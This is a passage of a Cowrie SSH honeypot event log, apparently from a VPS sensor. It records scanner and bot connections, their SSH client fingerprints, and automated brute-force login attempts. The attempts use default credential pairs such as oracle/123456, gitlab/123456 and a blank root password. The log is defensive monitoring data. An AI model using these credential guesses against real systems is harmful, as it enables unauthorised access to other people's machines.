sh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:26:35.913367Z","src_ip":"212.227.125.160","session":"0dba06f349ae"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-31T04:26:42.586380Z","src_ip":"212.227.235.229","session":"0ac7ca304c7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60420,"dst_ip":"1.2.3.4","dst_port":22,"session":"78678dd705c7","protocol":"ssh","message":"New connection: 212.227.125.160:60420 (1.2.3.4:22) [session: 78678dd705c7]","sensor":"my-vps","timestamp":"2025-08-31T04:26:43.605430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:26:44.300984Z","src_ip":"212.227.125.160","session":"78678dd705c7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:26:44.301785Z","src_ip":"212.227.125.160","session":"78678dd705c7"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:26:46.556382Z","src_ip":"212.227.125.160","session":"78678dd705c7"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:26:48.607409Z","src_ip":"212.227.125.160","session":"78678dd705c7"}
{"eventid":"cowrie.session.closed","duration":"70.5","message":"Connection lost after 70.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:26:51.598623Z","src_ip":"212.227.235.229","session":"0ac7ca304c7a"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:26:55.835303Z","src_ip":"212.227.125.160","session":"0dba06f349ae"}
{"eventid":"cowrie.session.closed","duration":"29.1","message":"Connection lost after 29.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:26:59.066877Z","src_ip":"212.227.125.160","session":"0dba06f349ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53608,"dst_ip":"1.2.3.4","dst_port":22,"session":"35081109f7f2","protocol":"ssh","message":"New connection: 212.227.235.229:53608 (1.2.3.4:22) [session: 35081109f7f2]","sensor":"my-vps","timestamp":"2025-08-31T04:27:02.447546Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:27:05.125844Z","src_ip":"212.227.235.229","session":"35081109f7f2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:27:05.126974Z","src_ip":"212.227.235.229","session":"35081109f7f2"}
{"eventid":"cowrie.login.failed","username":"gitlab","password":"123456","message":"login attempt [gitlab/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:27:17.084661Z","src_ip":"212.227.235.229","session":"35081109f7f2"}
{"eventid":"cowrie.session.closed","duration":"17.2","message":"Connection lost after 17.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:27:19.602608Z","src_ip":"212.227.235.229","session":"35081109f7f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49420,"dst_ip":"1.2.3.4","dst_port":22,"session":"816cada32edd","protocol":"ssh","message":"New connection: 212.227.235.229:49420 (1.2.3.4:22) [session: 816cada32edd]","sensor":"my-vps","timestamp":"2025-08-31T04:27:21.969573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:27:22.670902Z","src_ip":"212.227.235.229","session":"816cada32edd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:27:22.689249Z","src_ip":"212.227.235.229","session":"816cada32edd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51044,"dst_ip":"1.2.3.4","dst_port":22,"session":"a019676d79b4","protocol":"ssh","message":"New connection: 212.227.125.160:51044 (1.2.3.4:22) [session: a019676d79b4]","sensor":"my-vps","timestamp":"2025-08-31T04:27:28.754504Z"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"12345","message":"login attempt [oracle/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:27:28.869215Z","src_ip":"212.227.235.229","session":"816cada32edd"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:27:30.759480Z","src_ip":"212.227.125.160","session":"a019676d79b4"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:27:30.793015Z","src_ip":"212.227.235.229","session":"816cada32edd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:27:30.855950Z","src_ip":"212.227.125.160","session":"a019676d79b4"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-31T04:27:38.652785Z","src_ip":"212.227.125.160","session":"a019676d79b4"}
{"eventid":"cowrie.session.closed","duration":"12.8","message":"Connection lost after 12.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:27:41.602687Z","src_ip":"212.227.125.160","session":"a019676d79b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57664,"dst_ip":"1.2.3.4","dst_port":22,"session":"a58a6a1ec8dd","protocol":"ssh","message":"New connection: 212.227.235.229:57664 (1.2.3.4:22) [session: a58a6a1ec8dd]","sensor":"my-vps","timestamp":"2025-08-31T04:27:42.886995Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39668,"dst_ip":"1.2.3.4","dst_port":22,"session":"394c0ebae03d","protocol":"ssh","message":"New connection: 212.227.125.160:39668 (1.2.3.4:22) [session: 394c0ebae03d]","sensor":"my-vps","timestamp":"2025-08-31T04:27:43.361452Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-31T04:27:43.801713Z","src_ip":"212.227.235.229","session":"a58a6a1ec8dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40880,"dst_ip":"1.2.3.4","dst_port":22,"session":"e51f32039645","protocol":"ssh","message":"New connection: 212.227.235.229:40880 (1.2.3.4:22) [session: e51f32039645]","sensor":"my-vps","timestamp":"2025-08-31T04:27:43.834336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:27:43.994509Z","src_ip":"212.227.125.160","session":"394c0ebae03d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:27:43.995238Z","src_ip":"212.227.125.160","session":"394c0ebae03d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:27:44.912197Z","src_ip":"212.227.235.229","session":"e51f32039645"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:27:44.913242Z","src_ip":"212.227.235.229","session":"e51f32039645"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-31T04:27:45.078388Z","src_ip":"212.227.235.229","session":"a58a6a1ec8dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48364,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d6a1d1192d0","protocol":"ssh","message":"New connection: 212.227.125.160:48364 (1.2.3.4:22) [session: 1d6a1d1192d0]","sensor":"my-vps","timestamp":"2025-08-31T04:27:47.207169Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:27:47.208782Z","src_ip":"212.227.125.160","session":"1d6a1d1192d0"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-31T04:27:47.369977Z","src_ip":"212.227.125.160","session":"1d6a1d1192d0"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"12345","message":"login attempt [oracle/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:27:47.830710Z","src_ip":"212.227.125.160","session":"394c0ebae03d"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:27:48.019226Z","src_ip":"212.227.125.160","session":"1d6a1d1192d0"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:27:48.213995Z","src_ip":"212.227.125.160","session":"1d6a1d1192d0"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:27:50.872348Z","src_ip":"212.227.125.160","session":"394c0ebae03d"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:27:51.609175Z","src_ip":"212.227.235.229","session":"a58a6a1ec8dd"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-31T04:27:55.017737Z","src_ip":"212.227.235.229","session":"e51f32039645"}
{"eventid":"cowrie.session.closed","duration":"15.1","message":"Connection lost after 15.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:27:58.945870Z","src_ip":"212.227.235.229","session":"e51f32039645"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42032,"dst_ip":"1.2.3.4","dst_port":22,"session":"59120b9cb0ae","protocol":"ssh","message":"New connection: 212.227.125.160:42032 (1.2.3.4:22) [session: 59120b9cb0ae]","sensor":"my-vps","timestamp":"2025-08-31T04:28:00.905979Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51160,"dst_ip":"1.2.3.4","dst_port":22,"session":"096ce3e561ca","protocol":"ssh","message":"New connection: 212.227.235.229:51160 (1.2.3.4:22) [session: 096ce3e561ca]","sensor":"my-vps","timestamp":"2025-08-31T04:28:05.840021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:28:06.249325Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:28:06.250093Z","src_ip":"212.227.235.229","session":"096ce3e561ca"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:28:06.407731Z","src_ip":"212.227.125.160","session":"59120b9cb0ae"}
